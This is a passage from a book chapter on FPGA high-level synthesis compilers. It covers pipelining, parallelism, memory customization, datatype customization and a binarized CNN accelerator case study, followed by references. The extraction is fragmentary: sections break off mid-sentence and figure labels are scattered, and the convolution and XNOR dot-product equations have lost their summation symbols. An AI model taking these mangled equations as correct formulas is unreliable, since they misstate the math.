Zhao et al. 2015). The study in Ustun et al. (2020) recognizes the fact that the
additive delay model commonly used in the HLS tools does not accurately reflect the
true operator-level delay. They propose to use learning-based approaches to predict
the operator delay based on features extracted from existing designs as the training
set.
Besides operation chaining, modern FPGAs commonly contain dedicated DSP
blocks that can implement various common datapath patterns through DSP map-
ping. For example, the Xilinx DSP58 block in the Versal ACAP device includes
a 27-bit pre-adder, a 27-by-24-bit multiplier, as well as a 58-bit ALU that can
implement different operations such as addition, accumulation, and various bit-level
operations (Versal ACAP 2020). In Fig. 3, the add-multiply-add pattern is mapped
to the DSP block to utilize the fast pre-adder, multiplier, and post-adder in the DSP
block. Effectively detecting such DSP patterns during HLS optimization is critical to
achieve high performance. Ronak and Fahmy (2015a) propose an automated three-
step approach to partition a dataflow graph into subgraphs that can be mapped to a
DSP.
It is also worth noting that the hard blocks such as block memories and DSP
units on an FPGA can operate at a higher frequency than the LUT-based soft
logic. This provides the HLS tool additional opportunities to improve the resource
utilization by clocking such hard blocks at a faster rate. Such techniques are called
multi-pumping (Canis et al. 2013). For example, when one clocks a DSP block
twice as fast as the system clock (i.e., double pumping), one can reuse the same
physical block to perform two multiplications in one system clock cycle. The multi-
pumping technique has been demonstrated for both the DSP blocks (Ronak and
Fahmy 2015b) and the on-chip RAM modules (LaForest and Steffan 2010), showing
nontrivial DSP and RAM resource reductions with a small overhead in LUT and
register usage.
ILP-based approaches (Hwang et al. 1991) are among the early techniques
where various scheduling constraints can be expressed as an integer linear program.
System of difference constraints (SDC) is used in loop pipelining (Zhang and
Liu 2013) to improve the scalability of the ILP-based pipelining formulation by
realizing that most of the pipelining constraints are in the form of pairwise difference
constraints. The underlying constraint matrix of an SDC system has a special
property which guarantees that an integer-valued solution can be efficiently obtained
through solving a linear program (Zhang and Liu 2013). Ordering heuristics are
proposed to handle constraints that cannot be expressed as linear differences such
as the resource constraints. Recently, the authors of Dai et al. (2018) and Dai and
Zhang (2019) further extend the SDC-based scheduling formulation by encoding
the resource constraints part as a Boolean satisfiability (SAT) problem. The joint
SAT-SDC problem is solved iteratively through efficient conflict-driven learning to
find the exact solution while achieving a significant speedup over the ILP-based
alternatives.
Data hazards in the form of memory dependences limit the achievable II of
an HLS pipeline. In Fig. 4, there is a read-after-write (RAW) dependence between
two consecutive iterations. Thus, the best achievable II without violating the RAW
dependence is 3. However, in many scenarios, the memory dependences only occur
Fig. 4 Statically scheduled pipelining with the RAW data dependence and the loop rewind
optimization
1002 N. Srivastava et al.
A simple dataflow network Overlap within the Overlap within & across invocations
same invocation Invocation 1
Process A
A A
(load) Invocation 2
B B A
Process B
(compute) C C
B
Process C
(store)
C
time
Parallelization Techniques
As stated in Equation (1), increasing the parallelism in the design is vital to improve
the throughput of an FPGA accelerator. Depending on the design characteristics,
an HLS design can often be parallelized by exploiting either data- or task-
level parallelism. As illustrated in Fig. 6, vectorization can also be applied at the
operator-level to data-parallel applications to widen the datapath. Parallel loops
can be unrolled to execute multiple iterations concurrently. In addition, multiple
independent tasks can be processed in parallel to exploit task-level parallelism.
Figure 6 illustrates the difference between data-level and task-level parallelism. For
data-level parallelism, the set of operations performed on different data elements
are typically homogeneous. On the other hand, for task-level parallelism, each task
can be heterogeneous. In other words, each task executes different jobs in parallel.
In the following sections, the authors explain in more detail how the FPGA-specific
compilers exploit these different forms of parallelism.
Data1 Task
Task
Data2
Task Task
Data3 Task
Data4 Task Task
are used to satisfy the data dependencies. Hipacc (Reiche et al. 2017) uses the
concept of streaming objects to represent tasks and uses Vivado HLS streams
and Intel FPGA SDK for OpenCL channel interfaces to connect tasks with data
dependencies. T2S-Tensor (Srivastava et al. 2019) uses isolate directives to split a
task into multiple smaller sub-tasks that are connected via channels and are executed
in parallel. TAPA (Chi et al. 2020) is an HLS C++ language extension that enhances
the productivity of programming task-parallel applications on FPGAs.
The accesses to off-chip memory have higher latency and lower bandwidth com-
pared to the memory accesses to the on-chip memory. The high latency of memory
accesses can result in the compute pipeline being stalled for a significant period
of time leading to low performance with poor resource utilization. The low off-chip
memory bandwidth can result in low parallelism since the compute resources cannot
be scaled until there is sufficient bandwidth to supply the data. Thus, achieving
low-latency and high-bandwidth memory accesses is essential to achieve high
parallelism and high compute utilization, which are the key factors for performance
in Equation (1). In this section, the authors first discuss the data reuse buffers and
decoupled access-execute architectures that improve the utilization of the compute
resources by reducing the memory access latency. The authors then talk about two
common approaches for increasing the memory bandwidth: (a) data vectorization
and (b) memory banking.
such as Xilinx Vivado HLSand Intel FPGA SDK for OpenCL, loop splitting
and data tiling need to be performed manually at the source level. Many DSLs
such as Halide-HLS (Pu et al. 2017), T2S-Tensor (Srivastava et al. 2019), and
HeteroCL (Lai et al. 2019) allow the user to specify loop splitting and data
tiling using loop transformation primitives that are decoupled from the algorithmic
specification. Apart from user-specified data tiling, there have been multiple efforts
to automatically tile the application data using the polyhedral framework. Chugh
et al. (2016) built a DSL on top of PolyMage that tries to maximally exploit the
data reuse under the constraints of available on-chip memory capacity and off-chip
memory bandwidth. Pouchet et al. (2013) presented an end-to-end system using the
polyhedral model which automatically transforms the program for effective data
reuse, including the handling of on-chip buffers for FPGAs.
Depending on the memory access patterns, data reuse buffers can be imple-
mented in various forms such as random access buffers, FIFOs, cyclic shift-registers,
window buffers, and line buffers. Random access buffers allow data to be read and
written at any position. However, these types of buffers do not scale well since the
access time for a buffer increases with its size. Memory banking, as is discussed in
the next subsection, is a common way to split these large buffers into multiple small
buffers. FIFOs are used to provide asynchronous data transfer from producer to
consumer in designs that exhibit task-level pipelining. Cyclic shift registers are used
for cyclic accesses to a fixed amount of data. Line buffers and window buffers are
specific types of buffer implementations that are primarily used in image-processing
kernels with sliding window access patterns. The authors show an example of using
a pair of line buffer and window buffer in Fig. 7, where one computes a two-
dimensional convolution with filter size 3 × 3. The main purpose of such reuse
buffers is to reduce the memory accesses by caching reusable data. For instance,
suppose one unrolls loops r and c; one needs to access input in nine times per
iteration before applying reuse buffers (Fig. 7a Line 6). After applying reuse buffers,
one only needs one access (Fig. 7b Line 12). More details are discussed in the case
study (section “Case Study: Binarized Convolutional Neural Networks”).
There are different ways of specifying reuse buffers in modern HLS compilers.
Xilinx Vivado HLS and Intel FPGA SDK for OpenCL allow the user to implement
buffers using the arrays in C/C++/OpenCL. T2S-Tensor (Srivastava et al. 2019)
and SuSy (Lai et al. 2020) allow users to insert buffers into a tensor computation
using the loop removal and buffer insertion directives. Polymage (Mullapudi et al.
2015) automatically inserts buffers in the generated code for the output of each
intermediate function computation in the compute pipeline. HeteroCL (Lai et al.
2019) uses the reuse_at directive to create a reuse buffer. Halide-HLS (Pu et al.
2017), Darkroom (Hegarty et al. 2014), and Hipacc (Reiche et al. 2017) implement
mechanisms to specify the line buffer insertion in image processing pipelines.
Decoupled Access-Execute
The concept of decoupled access-execute (DAE) architecture was first introduced
by James Smith (1982) in the context of CPUs to hide the memory access latency.
Most of the FPGA accelerators today make use of the DAE scheme. Instead of
28 FPGA-Specific Compilers 1009
Fig. 7 Example of exploiting data reuse with a pair of window and line buffers. (a) HLS code for
2D convolution. (b) HLS code after introducing reuse buffers. (c) Mechanism of the line buffer
and window buffer
having the compute pipeline directly request data from memory, separate data access
(read or write) pipelines are instantiated to handle the data movement between the
main memory and the accelerator. Since the data access pipeline writes data to on-
chip buffers and a compute pipeline reads data from these buffers, it can introduce
new stalls in the pipeline. This inefficiency can be solved with double buffers (also
known as ping-pong buffers). A double buffer consists of two buffers, one for read,
called read buffer, and another one for write, called write buffer. The compute
pipeline processes the data tile in the read buffer while at the same time the memory
load/store pipeline replaces the data from an old tile with the new tile in the write
buffer. When the computation on the read buffer is complete and the write buffer is
filled with data, the two buffers are swapped (namely, read becomes write and write
becomes read). Double buffering has 2× area overhead as it requires 2× on-chip
storage. However, the area overhead is often outweighed by the pipeline efficiency
achieved in terms of less stalls and high throughput. The double buffer technique
is a form of latency hiding technique where one hides the memory latency of
loads/stores by overlapping the compute and memory pipelines and thus improve
1010 N. Srivastava et al.
the utilization in Equation (1). Chapter 24, “Accelerator Design with High-Level
Synthesis” also provided some other memory latency hiding techniques such as
hardware-managed caches and prefetchers.
C-based HLS compilers such as Vivado HLS, Intel FPGA SDK for OpenCLand
LegUp (Canis et al. 2011) allow specifying double buffers as memory arrays and a
boolean variable that determines the read and write buffers. T2S-Tensor (Srivastava
et al. 2019) allows the user to specify double buffer as a spatial optimization.
Data Vectorization
Data vectorization helps achieve high off-chip memory bandwidth utilization, which
is essential for memory-bound applications where the compute resources cannot
be scaled until there is enough memory bandwidth to feed the parallel compute
units. With data vectorization, instead of reading/writing a single element, one reads
and writes a vector of elements, such as sixteen 32-bit floating point numbers, in
the same step. Let us consider the example of a simple DDR model with a bus
width of 64 bits and burst length of 8. Whenever a DRAM access is completed
and an entire DRAM line is fetched from the memory array, the contiguous data
can be sent out to the memory in chunks of 64 bits for up to 8 consecutive
cycles. This means that accessing a 16-element vector of 32-bit floating point values
achieves higher bandwidth than individually accessing these 16 elements. Thus, data
vectorization helps achieve higher compute parallelism which directly results in a
higher throughput as in Equation (1).
T2S-Tensor (Srivastava et al. 2019) and Halide-HLS (Pu et al. 2017) allow the
user to specify data vectorization using vectorization directives. Intel FPGA SDK
for OpenCLprovides vector data-types for integers and floating point numbers that
can be used to perform vectorized memory accesses. Depending on the memory
access pattern it compiles global memory access into either a burst-coalesced load
store unit (LSU) that buffers requests until the largest possible burst can be made,
a prefetching LSU that prefetches the data assuming contiguous reads or a cached
burst-coalesced LSU which is a burst-coalesced LSU with an on-chip cache. Vivado
HLSalso allows the user to pack multiple data elements in a C struct to allow for
wide memory accesses. It allows burst-mode data transfer using either a memcpy
function in C or a pipelined for loop that accesses memory in a sequential order and
where the memory accesses are not placed inside conditional statements.
Memory Banking
An FPGA-based accelerator is typically highly parallelized and/or deeply pipelined
in order to achieve a desirable throughput as shown in Fig. 2. As a result, multiple
parallel accesses to a single on-chip memory are often required to provide the
necessary data bandwidth to sustain the high throughput of the accelerator. However,
the embedded memory blocks available on modern FPGA devices (e.g., BRAMs)
only provide a very limited number of ports for concurrent reads/writes. Simply
replicating the BRAMs to create multi-ported memories is not scalable or even
feasible due to the steep area overhead and potential memory coherence overhead
resulting from write operations. A more viable solution is memory banking,
which partitions a memory block into several smaller banks; thus, concurrent
28 FPGA-Specific Compilers 1011
Unlike most other general-purpose architectures (There are configurable and exten-
sible processor technologies such as Cadence Tensilica Xtensa (Gonzalez 2000)
and Synopsys ASIP Designerthat allow application-specific datapath bitwidth
customization.), FPGA has the ability to implement a custom datapath consisting of
arithmetic and memory units that are not uniformly sized to a fixed bitwidth. This
allows programmers to exploit different numerical data types with the precision
tailored for a given application. Such flexibility can substantially improve the
efficiency for both compute engines and the custom memory hierarchy. For example,
multiple low-bitwidth data elements can be packed together into a wide bit vector
without increasing the footprint on the main memory. The packed data can then be
read/written in a single memory transaction, which greatly improves the bandwidth
utilization and the overall operational intensity of the accelerator. In addition,
operations with reduced bitwidth require fewer resources, and thus more compute
units can potentially be allocated on the same FPGA device to increase hardware
parallelism.
value range analysis. The common approach is to iteratively propagate the bitwidth
information on the underlying dataflow graph using both forward and backward
propagations until a fixed point is reached or the gain is diminishing (Stephenson
et al. 2000).
Algorithm Overview
In a BNN (and CNN in general), a conv layer takes in M input feature maps of size
I ×I pixels, convolves them with filters of size K ×K pixels, and produces N output
feature maps of size S × S pixels. The corresponding compute can be expressed as
the following equation.
K−1
M−1 K−1
outn (x, y) = inm (x + c, y + r) × wm,n (c, r),
m=0 r=0 c=0
where outn (x, y) denotes the value of pixel (x, y) in the nth output feature map,
inm is the mth input feature map, and wm,n is the filter that convolves with input
inm and produces a partial sum of output outn . Figure 8 shows how a conv layer can
be described in a C loop nest.
The main advantage of binarization is that one can replace the expensive
multiplications by the cheap bitwise logic operations. Figure 9 shows how one
1014 N. Srivastava et al.
Fig. 9 The encoding and multiplication for binarized variables. (a) Normal multiplication
between binarized variables x and y. (b) Binary multiplication using XNOR with encoded
variables x̂ and ŷ
L
L
A·B= Ai × Bi = 2 (Âi B̂i ) − L, (2)
i=0 i=0
Here A and B are two vectors with the same length L (i.e., |A| = |B| = L), Ai and
Bi are binarized values that are either +1 or −1, andÂi and B̂i are encoded values
for Ai and Bi according to Fig. 9. The summation ( ) in Equation (2) requires an
integer addition. A more concrete example is shown below, where the entire dot
product is multiplierless.
Fig. 10 Sources of parallelism within a convolution layer. (a) Parallelism across filter pixels. (b)
Parallelism across input feature maps. (c) Parallelism across output feature maps. (d) Parallelism
across output pixels
Fig. 11 BNN code snippet with loop pipelining, unrolling, and fusion
A similar issue also exists for w. To overcome the port limitation, one needs to
perform memory optimizations, which the authors discuss in the next section.
Data Vectorization
The next optimization one can perform is data vectorization, which packs the
binarized values into long-bitwidth integers. The vectorized data can then be
read/written in a single memory transaction, which greatly improves the bandwidth
utilization and the overall operational intensity. To realize data vectorization in
HLS, arbitrary-precision data types are essential to describe the packed data (e.g.,
ap_(u)int for Xilinx HLS and ac_(u)int for Intel HLS).
Similar to pipelining and unrolling, data vectorization exploits another source
of parallelism in a conv layer. In this case study, the authors choose to vectorize
along the input feature maps (i.e., Fig. 10b) since it works well with our pipelining
and unrolling scheme. After vectorization, the dot products become popcount
operations. Figure 12 shows the algorithm after applying bit packing. Note that after
vectorization, loop m does not exist within the fused pipelined loop anymore.
28 FPGA-Specific Compilers 1017
Evaluation
Fig. 13 Optimized BNN codes in different programming languages. (a) HeteroCL. (b) HLS
28 FPGA-Specific Compilers 1019
each optimization cumulatively. For this specific design, the lower latency leads to a
higher throughput. In our experiments, the authors select M = 16, N = 32, S = 9,
K = 3. The target device and clock period are Xilinx Zynq and 10 ns, respectively.
Table 2 shows the final results. Comparing to HLS C/C++, the programmer can carry
out most optimization steps in HeteroCL by simply applying different customization
primitives without modifying the algorithm, which is usually a more productive and
less error-prone process.
From the table, one can see that pipelining and unrolling can effectively reduce
the latency, while also increasing the resource usage. Moreover, the achieved II
is only five because of the resource contention, which becomes the performance
bottleneck. To solve that, by using reuse buffers (i.e., line buffers and window
buffers), now II = 1 can be achieved, which provides another 5.0× speedup as
expected. Finally, with bit packing, the authors achieve another 15.9× speedup
since the authors exploit the parallelism across the input feature maps (i.e., the
authors pack M = 16 bits into a single integer). To sum up, the authors achieve
around 592× speedup over the baseline design while using approximately 4× more
resources.
Concluding Remarks
This chapter surveys popular FPGA HLS compilers and discusses the key opti-
mizations in these tools to improve the throughput of FPGA-based designs.
Such optimizations improve one or more of the performance factors: parallelism,
utilization, and clock frequency. The authors describe representative optimization
techniques in the literature in four major categories, including pipelining, paral-
lelization, memory customization, and datatype customization. The authors also
present a case study on an HLS-based BNN accelerator to show the impacts of
these techniques.
It is clear that the latest generation of FPGA-targeted compilers and program-
ming languages have made significant progress in making FPGA more accessible
to software developers. As a result, FPGA programmers can now more produc-
tively implement various important hardware customization techniques to build
an efficient accelerator with high quality of results. Despite this encouraging
development, current FPGAs are not fully software programmable – at least
not in the conventional manner that works for microprocessors, even with the
introduction of HLS. It may still take hours or days to compile HLS-generated
1020 N. Srivastava et al.
RTL to bitstream due to the slow physical design steps. Clearly, there remains
a host of challenges and opportunities for FPGA-specific compilers to compile a
high-level software specification to bitstream within minutes, and with significantly
less manual effort involved. To this end, it is to our belief that physical-aware HLS
(Guo et al. 2020, 2021) and bottom-up modular place-and-route will be crucial to
enable a much faster FPGA design closure. The authors also believe that domain-
specific overlay architectures (Abdelfattah et al. 2018; Ma et al. 2019) will play an
increasingly important role in providing a programming experience that resembles
software development. Furthermore, integration with the high-level software stack
is necessary in order to increase adoption of FPGAs by software programmers.
References
Aamodt TM, Chow P (2008) Compile-time and instruction-set methods for improving floating-
to fixed-point conversion accuracy. In: ACM transactions in embedded computing systems
(TECS)
Abadi M, Barham P, Chen J, Chen Z, Davis A, Dean J, Devin M, Ghemawat S, Irving G, Isard M
et al (2016) Tensorflow: a system for large-scale machine learning. In: USENIX symposium on
operating systems design and implementation (OSDI)
Abdelfattah MS, Han D, Bitar A, DiCecco R, O’Connell S, Shanker N, Chu J, Prins I, Fender
J, Ling AC et al (2018) Dla: compiler and FPGA overlay for neural network inference
acceleration. In: International conference on field programmable logic and applications (FPL)
Bacon DF, Rabbah R, Shukla S (2013) FPGA programming for the masses. In: Communications
of the ACM
Bansal S, Hsiao H, Czajkowski T, Anderson JH (2018) High-level synthesis of software-
customizable floating-point cores. In: Design, automation, and test in Europe (DATE)
Bezati E, Emami M, Larus J (2020) Advanced dataflow programming using actor machines for
high-level synthesis. In: International symposium on field-programmable gate arrays (FPGA)
Canis A, Choi J, Aldham M, Zhang V, Kammoona A, Anderson JH, Brown S, Czajkowski T (2011)
LegUp: high-level synthesis for FPGA-based processor/accelerator systems. In: International
symposium on field-programmable gate arrays (FPGA)
Canis A, Anderson JH, Brown SD (2013) Multi-pumping for resource reduction in FPGA high-
level synthesis. In: Design, automation, and test in Europe (DATE)
Carlson T, Van Wyk E (2019) Building parallel programming language constructs in the AbleC
extensible C compiler framework: a PPoPP tutorial. In: ACM SIGPLAN conference on
principles and practice of parallel programming (PPoPP)
Carmichael Z, Langroudi HF, Khazanov C, Lillie J, Gustafson JL, Kudithipudi D (2019) Deep
positron: a deep neural network using the posit number system. In: Design, automation, and
test in Europe (DATE)
Chen T, Li M, Li Y, Lin M, Wang N, Wang M, Xiao T, Xu B, Zhang C, Zhang Z (2015) Mxnet:
a flexible and efficient machine learning library for heterogeneous distributed systems. arXiv
preprint arXiv:1512.01274
Chen T, Moreau T, Jiang Z, Zheng L, Yan E, Shen H, Cowan M, Wang L, Hu Y, Ceze L et al
(2018) TVM: an automated end-to-end optimizing compiler for deep learning. In: USENIX
symposium on operating systems design and implementation (OSDI)
Cheng J, Josipovic L, Constantinides GA, Ienne P, Wickerson J (2020) Combining dynamic &
static scheduling in high-level synthesis. In: International symposium on field-programmable
gate arrays (FPGA)
Cherubin S, Cattaneo D, Chiari M, Di Bello A, Agosta G (2019) TAFFO: tuning assistant for
floating to fixed point optimization. In: IEEE embedded systems letters
28 FPGA-Specific Compilers 1021
Chi Y, Cong J, Wei P, Zhou P (2018) SODA: stencil with optimized dataflow architecture. In:
International conference on computer-aided design (ICCAD)
Chi Y, Guo L, Choi Y-K, Wang J, Cong J (2020) Extending high-level synthesis for task-parallel
programs. arXiv preprint arXiv:2009.11389
Choi J, Brown S, Anderson J (2013) From software threads to parallel hardware in high-level
synthesis for FPGAs. In: International conference on field programmable technology (FPT)
Choi Y-K, Cong J, Fang Z, Hao Y, Reinman G, Wei P (2016) A quantitative analysis on
microarchitectures of modern CPU-FPGA platforms. In: Design automation conference (DAC)
Chugh N, Vasista V, Purini S, Bondhugula U (2016) A DSL compiler for accelerating image
processing pipelines on FPGAs. In: International conference on parallel architectures and
compilation
Cilardo A, Gallo L (2015) Improving multibank memory access parallelism with lattice-based
partitioning. In: ACM transactions on architecture and code optimization (TACO)
Cong J, Wang J (2018) PolySA: polyhedral-based systolic array auto-compilation. In: International
conference on computer-aided design (ICCAD)
Cong J, Liu B, Neuendorffer S, Noguera J, Vissers K, Zhang Z (2011) High-level synthesis for
FPGAs: from prototyping to deployment. In: IEEE transactions on computer-aided design of
integrated circuits and systems (TCAD)
Cong J, Wei P, Yu CH, Zhang P (2018) Automated accelerator generation and optimization with
composable, parallel and pipeline architecture. In: Design automation conference (DAC)
Courbariaux M, Hubara I, Soudry D, El-Yaniv R, Bengio Y (2016) Binarized neural networks:
training deep neural networks with weights and activations constrained to +1 or -1. arXiv
preprint arXiv:1602.02830
Coussy P, Chavet C, Bomel P, Heller D, Senn E, Martin E (2008) GAUT: a high-level synthesis
tool for DSP applications. Springer, Dordrecht
Dai S, Zhang Z (2019) Improving scalability of exact modulo scheduling with specialized conflict-
driven learning. In: Design automation conference (DAC)
Dai S, Zhao R, Liu G, Srinath S, Gupta U, Batten C, Zhang Z (2017) Dynamic hazard resolution
for pipelining irregular loops in high-level synthesis. In: International symposium on field-
programmable gate arrays (FPGA)
Dai S, Liu G, Zhang Z (2018) A scalable approach to exact resource-constrained scheduling based
on a joint SDC and SAT formulation. In: International symposium on field-programmable gate
arrays (FPGA)
de Fine Licht J, Besta M, Meierhans S, Hoefler T (2018) Transformations of high-level synthesis
codes for high-performance computing. arXiv preprint arXiv:1805.08288
Dennis JB (1974) First version of a data flow procedure language. In: Programming symposium
De Dinechin F, Pasca B (2011) Designing custom arithmetic data paths with FloPoCo. IEEE Des
Test Comput 28:18–27
Eker J, Janneck J (2003) CAL language report: specification of the CAL actor language. EECS
Department, University of California, Berkeley Technical Report
Fort B, Canis A, Choi J, Calagar N, Lian R, Hadjis S, Chen YT, Hall M, Syrowik B, Czajkowski
T et al (2014) Automating the design of processor/accelerator embedded systems with legup
high-level synthesis. In: International conference on embedded and ubiquitous computing
Gaide B, Gaitonde D, Ravishankar C, Bauer T (2019) Xilinx adaptive compute acceleration
platform: VersalTM architecture. In: International symposium on field-programmable gate
arrays (FPGA)
Gilles K (1974) The semantics of a simple language for parallel programming. In: Information
processing
Gonzalez RE (2000) Xtensa: a configurable and extensible processor. IEEE Micro 20:60–70
Govindu G, Scrofano R, Prasanna VK (2005) A library of parameterizable floating-point cores
for FPGAs and their application to scientific computing. In: International conference on
engineering reconfigurable systems and algorithms
Guo L, Lau J, Chi Y, Wang J, Yu CH, Chen Z, Zhang Z, Cong J (2020) Analysis and optimization of
the implicit broadcasts in FPGA HLS to improve maximum frequency. In: Design automation
conference (DAC)
1022 N. Srivastava et al.
Guo L, Chi Y, Wang J, Lau J, Qiao W, Ustun E, Zhang Z, Cong J (2021) AutoBridge:
coupling coarse-grained floorplanning and pipelining for high-frequency HLS design on multi-
die FPGAs. In: International symposium on field-programmable gate arrays (FPGA)
Hadjis S, Olukotun K (2019) Tensorflow to coud FPGAs: tradeoffs for accelerating deep neural
networks. In: International conference on field programmable logic and applications (FPL)
Hegarty J, Brunhaver J, DeVito Z, Ragan-Kelley J, Cohen N, Bell S, Vasilyev A, Horowitz M,
Hanrahan P (2014) Darkroom: compiling high-level image processing code into hardware
pipelines. ACM Trans Graph (TOG) 33:1–11
Hegarty J, Daly R, DeVito Z, Ragan-Kelley J, Horowitz M, Hanrahan P (2016) Rigel: flexible
multi-rate image processing hardware. In: ACM transactions on graphics (TOG)
Hsiao H, Anderson J (2019) Thread weaving: static resource scheduling for multithreaded high-
level synthesis. In: Design automation conference (DAC)
Hwang C-T, Lee J-H, Hsu Y-C (1991) A formal approach to the scheduling problem in high-level
synthesis. In: IEEE transactions on computer-aided design of integrated circuits and systems
(TCAD)
Ishikawa A, Fukushima N, Maruoka A, Iizuka T (2019) Halide and GENESIS for generating
domain-specific architecture of guided image filtering. In: International symposium on circuits
and systems (ISCAS)
Jaiswal MK, Cheung RCC (2013) Area-efficient architectures for double precision multiplier on
FPGA, with run-time-reconfigurable dual single precision support. Microelectron J 44:421–430
Janneck JW, Miller ID, Parlour DB, Roquier G, Wipliez M, Raulet M (2011) Synthesizing
hardware from dataflow programs. J Sig Process Syst 63:241–249
Jia Y, Shelhamer E, Donahue J, Karayev S, Long J, Girshick R, Guadarrama S, Darrell T (2014)
Caffe: convolutional architecture for fast feature embedding. In: International conference on
multimedia
Josipovic L, Brisk P, Ienne P (2017) From C to elastic circuits. In: Asilomar conference on signals,
systems, and computers
Josipović L, Ghosal R, Ienne P (2018) Dynamically scheduled high-level synthesis. In:
International symposium on field-programmable gate arrays (FPGA)
Josipovic L, Guerrieri A, Ienne P (2019) Speculative dataflow circuits. In: International symposium
on field-programmable gate arrays (FPGA)
Kato Y, Seto K (2013) Loop fusion with outer loop shifting for high-level synthesis. In: IPSJ
transactions on system LSI design methodology
King M, Dave N (2012) Automatic generation of hardware/software interfaces. In: ACM
SIGARCH computer architecture news
Koeplinger D, Prabhakar R, Zhang Y, Delimitrou C, Kozyrakis C, Olukotun K (2016) Automatic
generation of efficient accelerators for reconfigurable hardware. In: International symposium
on computer architecture (ISCA)
Koeplinger D, Feldman M, Prabhakar R, Zhang Y, Hadjis S, Fiszel R, Zhao T, Nardi L, Pedram
A, Kozyrakis C et al (2018) Spatial: a language and compiler for application accelerators. In:
ACM SIGPLAN conference on programming language design and implementation (PLDI)
Kung H-T (1982) Why systolic architectures? IEEE Comput 15:37–46
LaForest CE, Steffan JG (2010) Efficient multi-ported memories for FPGAs. In: International
symposium on field-programmable gate arrays (FPGA)
Lai Y-H, Chi Y, Hu Y, Wang J, Yu CH, Zhou Y, Cong J, Zhang Z (2019) HeteroCL: a multi-
paradigm programming infrastructure for software-defined reconfigurable computing. In:
International symposium on field-programmable gate arrays (FPGA)
Lai Y-H, Rong H, Zheng S, Zhang W, Cui X, Jia Y, Wang J, Sullivan B, Zhang Z, Liang Y et al
(2020) SuSy: a programming model for productive construction of high-performance systolic
arrays on FPGAs. In: International conference on computer-aided design (ICCAD)
Lee EA, Messerschmitt DG (1987) Synchronous data flow. In: Proceedings of the IEEE
Lee H, Brown K, Sujeeth A, Chafi H, Rompf T, Odersky M, Olukotun K (2011) Implementing
domain-specific languages for heterogeneous parallel computing. In: IEEE Micro
28 FPGA-Specific Compilers 1023
Liao S-W, Kuang S-Y, Kao C-L, Tu C-H (2019) A halide-based synergistic computing framework
for heterogeneous systems. J Sig Process Syst 91:219–233
Li J, Chi Y, Cong J (2020) HeteroHalide: from image processing DSL to efficient FPGA
acceleration. In: International symposium on field-programmable gate arrays (FPGA)
Lindtjorn O, Clapp R, Pell O, Fu H, Flynn M, Mencer O (2011) Beyond traditional microproces-
sors for geoscience high-performance computing applications. In: IEEE Micro
Liu J, Wickerson J, Constantinides GA (2016) Loop splitting for efficient pipelining in high-level
synthesis. In: IEEE symposium on field programmable custom computing machines (FCCM)
Ma R, Hsu J-C, Tan T, Nurvitadhi E, Sheffield D, Pelt R, Langhammer M, Sim J, Dasu A, Chiou
D (2019) Specializing fgpu for persistent deep learning. In: International conference on field
programmable logic and applications (FPL)
Meeuws R, Galuzzi C, Bertels K (2011) High level quantitative hardware prediction modeling
using statistical methods. In: International conference on embedded computer systems:
architectures, modeling and simulation
Menard D, Chillet D, Sentieys O (2006) Floating-to-fixed-point conversion for digital signal
processors. EURASIP J Adv Sig Process
Meng C, Yin S, Ouyang P, Liu L, Wei S (2015) Efficient memory partitioning for parallel data
access in multidimensional arrays. In: Design automation conference (DAC)
Merlin Compiler (2020) Falcon Computing Solutions. https://github.com/falconcomputing/
merlin-compiler
Moreau T, Chen T, Jiang Z, Ceze L, Guestrin C, Krishnamurthy A (2018) VTA: an open hardware-
software stack for deep learning. arXiv preprint arXiv:1807.04188
Mullapudi RT, Vasista V, Bondhugula U (2015) Polymage: automatic optimization for image
processing pipelines. ACM SIGARCH Comput Archit News 43:429–443
Najjar WA, Villarreal J, Halstead RJ (2016) ROCCC 2.0. In: FPGAs for software programmers
Nane R, Sima VM, Quoc CP, Goncalves F, Bertels K (2014) High-level synthesis in the Delft
workbench hardware/software co-design tool-chain. In: International conference on embedded
and ubiquitous computing
Nigam R, Atapattu S, Thomas S, Li Z, Bauer T, Ye Y, Koti A, Sampson A, Zhang Z (2020)
Predictable accelerator design with time-sensitive affine types. In: ACM SIGPLAN conference
on programming language design and implementation (PLDI)
Ostadzadeh SA, Meeuws RJ, Galuzzi C, Bertels K (2010) Quad–a memory access pattern analyser.
In: International symposium on applied reconfigurable computing
Papakonstantinou A, Gururaj K, Stratton JA, Chen D, Cong J, Hwu W-MW (2009) FCUDA:
enabling efficient compilation of CUDA kernels onto FPGAs. In: Symposium on application
specific processors (SASP)
Paszke A, Gross S, Massa F, Lerer A, Bradbury J, Chanan G, Killeen T, Lin Z, Gimelshein N,
Antiga L et al (2019) Pytorch: an imperative style, high-performance deep learning library.
arXiv preprint arXiv:1912.01703
Peverelli F, Rabozzi M, Del Sozzo E, Santambrogio MD (2018) OXiGen: a tool for automatic
acceleration of C functions into dataflow FPGA-based kernels. In: International parallel and
distributed processing symposium on workshop (IPDPSW)
Pilato C, Ferrandi F (2013) Bambu: a modular framework for the high-level synthesis of
memory-intensive applications. In: International conference on field programmable logic and
applications (FPL)
Pouchet L-N, Zhang P, Sadayappan P, Cong J (2013) Polyhedral-based data reuse optimization
for configurable computing. In: International symposium on field-programmable gate arrays
(FPGA)
Pu J, Bell S, Yang X, Setter J, Richardson S, Ragan-Kelley J, Horowitz M (2017) Programming
heterogeneous systems from an image processing DSL. ACM Trans Archit Code Optim (TACO)
14:1–25
Putnam A, Bennett D, Dellinger E, Mason J, Sundararajan P, Eggers S (2008) CHiMPS: a c-level
compilation flow for hybrid CPU-FPGA architectures. In: International conference on field
programmable logic and applications (FPL)
1024 N. Srivastava et al.
Contents
Approximate Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1028
Approximate Arithmetic Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1030
Design Methodologies for Approximate Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1030
Error Metrics and Evaluation Analysis for Approximate Components . . . . . . . . . . . . . . . 1034
Design Methods for Building Approximate Hardware Accelerators: Case
Studies for Error-Tolerant Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1037
Image and Video Processing Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1038
Deep Neural Networks (DNNs) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1046
Cross-Layer Approximations for Error-Tolerant Applications . . . . . . . . . . . . . . . . . . . . . . . . 1052
Methodology for Combining Hardware- and Software-Level Approximations . . . . . . . . 1052
